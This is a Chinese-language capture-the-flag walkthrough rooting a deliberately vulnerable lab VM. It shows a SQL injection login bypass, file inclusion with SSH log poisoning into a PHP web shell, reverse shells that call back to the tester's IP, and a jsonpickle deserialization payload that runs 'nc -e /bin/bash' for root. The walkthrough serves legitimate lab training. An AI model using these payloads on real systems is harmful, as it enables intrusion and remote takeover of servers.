本文内容纯属虚构,攻略鸭求b站关注点赞支持!
要用VirtualBox,VMware不行
靶机IP地址:192.168.31.215
【资料图】
测试机IP地址:192.168.31.38
外部信息收集
访问http://192.168.31.215/只有一个img图片
端口扫描
PORT STATE SERVICE REASON VERSION22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10 (protocol 2.0)80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
网站目录枚举
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.215/FUZZ -e .php,.txt -c/gods/atlantis.php/sea.php
访问http://192.168.31.215/gods/发现三个log文件:hades.log、zeus.log、poseidon.log,分别是三个神话人物介绍
搜索引擎搜返回内容,是执行uptime命令的结果。
访问http://192.168.31.215/atlantis.php有登录框
通过SQLi万能密码登录,响应码302跳转至sea.php,点击hades选项后URL变为:http://192.168.31.215/sea.php?file=hades。内容为hades.log文件的介绍。
测试文件包含漏洞
GET /sea.php?file=../../../../../../etc/passwdGET /sea.php?file=../../../../../etc/passwd%00都失败想到hades.log、zeus.log、poseidon.log都为.log后缀,尝试读取.log文件GET /sea.php?file=../../../../../var/log/auth成功返回了SSH日志ssh '<?php phpinfo(); ?>'@192.168.31.215GET /sea.php?file=../../../../../var/log/auth成功返回了phpinfo页面ssh '<?php system($_GET['cmd']); ?>'@192.168.31.215GET /sea.php?cmd=id&file=../../../../../var/log/authuid=33(www-data) gid=33(www-data) groups=33(www-data)$ nc -nvlp 9000GET /sea.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.31.38%22%2C9000%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27&file=../../../../../var/log/auth$ python -c 'import pty;pty.spawn("/bin/bash")'
本地信息收集
www-data@MiWiFi-R3600-srv:/var/www/html$ cat atlantis.php<?php define('DB_USERNAME', 'root'); define('DB_PASSWORD', 'yVzyRGw3cG2Uyt2r'); $db = new PDO("mysql:host=localhost:3306;dbname=db", DB_USERNAME,DB_PASSWORD);$statement = $db->prepare("Select * from users where username='".$username."' and pwd='".$pwd."'"); $statement->execute();www-data@MiWiFi-R3600-srv:/var/www/html$ cat sea.phpcat sea.php<?phpinclude("gods/". $_GET['file']. '.log');?>www-data@MiWiFi-R3600-srv:/$ cat /etc/passwdcat /etc/passwdroot:x:0:0:root:/root:/bin/bashposeidon:x:1000:1000:,,,:/home/poseidon:/bin/bash本地开放端口tcp LISTEN 0 128 127.0.0.1:8080 0.0.0.0:* Useful software:/usr/bin/base64/usr/bin/g++/usr/bin/gcc/usr/bin/make/usr/bin/nc/usr/bin/nc.traditional/usr/bin/netcat/usr/bin/perl/usr/bin/php/usr/bin/ping/usr/bin/python/usr/bin/python2/usr/bin/python2.7/usr/bin/python3/usr/bin/python3.7/usr/bin/socat/usr/bin/wget/opt文件夹通常是空的,发现存在/opt/codewww-data@symfonos4:/opt/code$ ls -alhdrwxr-xrwx 4 root root 4.0K Aug 19 2019 .drwxr-xr-x 3 root root 4.0K Aug 18 2019 ..-rw-r--r-- 1 root root 942 Aug 19 2019 app.py-rw-r--r-- 1 root root 1.5K Aug 19 2019 app.pycdrwxr-xr-x 4 root root 4.0K Aug 19 2019 staticdrwxr-xr-x 2 root root 4.0K Aug 19 2019 templates-rw-r--r-- 1 root root 215 Aug 19 2019 wsgi.pyccat app.py发现jsonpickle
socat转发8080端口
socat TCP-LISTEN:8081,fork TCP:127.0.0.1:8080
访问http://192.168.31.215:8081/whoami
Cookie: PHPSESSID=q7ctie2m9dp9fhv48m82t28204; username=eyJweS9vYmplY3QiOiAiYXBwLlVzZXIiLCAidXNlcm5hbWUiOiAiUG9zZWlkb24ifQ==
username用base64解码为:{"py/object": "app.User", "username": "Poseidon"}
flask-json-pickle漏洞
搜索jsonpickle exploit,找到flask-json-pickle漏洞,exp:
{"py/object": "__main__.Shell", "py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": ["whoami"]}, null, null, null]}
测试机开启监听端口:nc -nvlp 3334
修改系统命令调用方法为os.system,改为:
{"py/object":"main.Shell","py/reduce":[{"py/type":"os.system"},{"py/tuple":["/usr/bin/nc -e /bin/bash 192.168.31.38 3334"]},null,null,null]}
Base64编码后发送,得到shell
iduid=0(root) gid=0(root) groups=0(root)
其他
flag
# cat /root/proof.txtCongrats on rooting symfonos:3!
疑问求助
1.flask-json-pickle漏洞的exp中换nc以外的方法都未成功;
2.是否还有其他提权方法?
关键词:
还有其他
系统命令
端口扫描
